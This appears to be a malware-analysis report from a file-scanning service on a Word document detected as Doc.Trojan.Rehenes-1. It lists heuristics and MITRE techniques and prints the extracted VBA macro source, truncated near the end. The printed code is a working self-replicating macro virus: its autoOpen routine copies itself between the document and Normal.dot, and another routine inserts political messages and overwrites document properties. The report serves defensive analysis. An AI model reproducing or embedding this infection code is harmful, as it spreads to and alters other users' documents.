MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The document body's text, 'en memoria de los caídos en la crisis de los rehenes', is likely a lure to encourage macro execution. The VBA macro itself appears to be a tool for managing macros, but its presence in conjunction with the AutoOpen function and the ClamAV detection strongly suggests it's part of a malicious chain.
Heuristics 4
-
ClamAV: Doc.Trojan.Rehenes-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Rehenes-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6679 bytes |
SHA-256: e89a586cec3a2a6b5a185680eb809fdbb1e927a6a3fa5c8b9dee40006cb62048 |
|||
|
Detection
ClamAV:
Doc.Trojan.Rehenes-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "HerramMacro"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Ejecuta, crea, borra o revisa una macro."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.HerramMacro.MAIN"
Dim botón
ReDim CuadroLista1__$(0)
ReDim CuadroLista2__$(0)
ReDim ListaDesple1__$(3)
ListaDesple1__$(0) = "Todas las plantillas activas"
ListaDesple1__$(1) = "Normal.dot (plantilla global)"
ListaDesple1__$(2) = "Comandos de Word"
WordBasic.BeginDialog 445, 310, "Macros"
WordBasic.Text 10, 6, 159, 13, "&Nombre de la Macro:", "Texto1"
WordBasic.TextBox 10, 22, 250, 18, "Cuadro_de_texto1"
WordBasic.ListBox 19, 43, 243, 152, CuadroLista1__$(), "Cuadro_de_lista1"
WordBasic.Text 19, 201, 175, 13, "M&acros disponibles en:", "Texto2"
WordBasic.DropListBox 19, 216, 400, 50, ListaDesple1__$(), "ListaDesplegable1"
WordBasic.Text 19, 240, 91, 13, "D&escripción", "Texto4"
WordBasic.ListBox 19, 256, 402, 50, CuadroLista2__$(), "Cuadro_de_lista2"
WordBasic.PushButton 286, 10, 140, 21, "Graba&r", "Presionar1"
WordBasic.CancelButton 286, 35, 140, 21
WordBasic.PushButton 286, 65, 140, 21, "Ejecutar", "Presionar2"
WordBasic.PushButton 286, 90, 140, 21, "Crear", "Presionar3"
WordBasic.PushButton 286, 115, 140, 21, "Eliminar", "Presionar4"
WordBasic.PushButton 286, 145, 140, 21, "&Organizador...", "Presionar5"
WordBasic.EndDialog
Dim diálogoEjem As Object: Set diálogoEjem = WordBasic.CurValues.UserDialog
botón = WordBasic.Dialog.UserDialog(diálogoEjem)
End Sub
Attribute VB_Name = "autoOpen"
Public Sub MAIN()
Dim micro$
Dim globo$
Dim macro$
On Error GoTo -1: On Error GoTo Chesu
WordBasic.FileSummaryInfo Update:=1
Dim Keiko As Object: Set Keiko = WordBasic.DialogRecord.FileSummaryInfo(False)
WordBasic.CurValues.FileSummaryInfo Keiko
micro$ = Keiko.Directory + "\" + Keiko.FileName + ":autoOpen"
globo$ = "Global:autoOpen"
macro$ = LCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))
If macro$ = "normal.dot" Then
WordBasic.MacroCopy globo$, micro$
micro$ = Keiko.Directory + "\" + Keiko.FileName + ":HerramMacro"
globo$ = "Global:HerramMacro"
WordBasic.MacroCopy globo$, micro$
Else
WordBasic.MacroCopy micro$, globo$
micro$ = Keiko.Directory + "\" + Keiko.FileName + ":HerramMacro"
globo$ = "Global:HerramMacro"
WordBasic.MacroCopy micro$, globo$
End If
WordBasic.FileSaveAs Format:=1
GoTo Sigue
Chesu:
On Error GoTo -1: On Error GoTo 0
Sigue:
Abracadabra
End Sub
Private Sub Abracadabra()
Dim buejn$
Dim Valx$
RandomWord
Select Case Rnd()
Case Is < 0.4
buejn$ = "Fujimori al 2005"
Case Is > 0.9
buejn$ = "fuera clones malignos "
Case Is < 0.5
buejn$ = "libertad! 22 de Abril de 1997 "
Case Is > 0.8
buejn$ = "¡¡¡La pareja del año: Fujimori y Beatriz Boza!!! Es lo que dice Susana, no se si es por celosa o porque le gusta que Betty sea mi calentao"
Case Is < 0.6
buejn$ = "en memoria de los caídos en la crisis de los rehenes "
Case Is > 0.7
buejn$ = "Para conseguir el antivirus contactarse con nicolas@amauta.rcp.net.pe y preguntar por el Sr. Lúcar o con el Sr Montesinos a montesinos@colina.sin.mil.pe"
Case Else
buejn$ = "¿Alumno de una conocida Universidad del Perú, Sr. José Martínez? "
End Select
WordBasic.Insert buejn$
WordBasic.StartOfDocument
WordBasic.FileSummaryInfo Title:="Crisis de los Rehenes"
WordBasic.FileSummaryInfo Subject:="Operativo Chavín de Huántar"
WordBasic.FileSummaryInfo Author:="Alberto Fujimori"
WordBasic.FileSummaryInfo Keywords:="WM.Fujimori"
On Error GoTo -1: On Error GoTo Chesu
WordBasic.FileSave
GoTo Yata
Chesu:
WordBasic.MsgBox "Microsoft Word editará el documento pero con ciertas dificultades. Se recomienda quitar la protección contra escritura del disco."
GoTo Alaproxima
Yata:
Select Cas
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.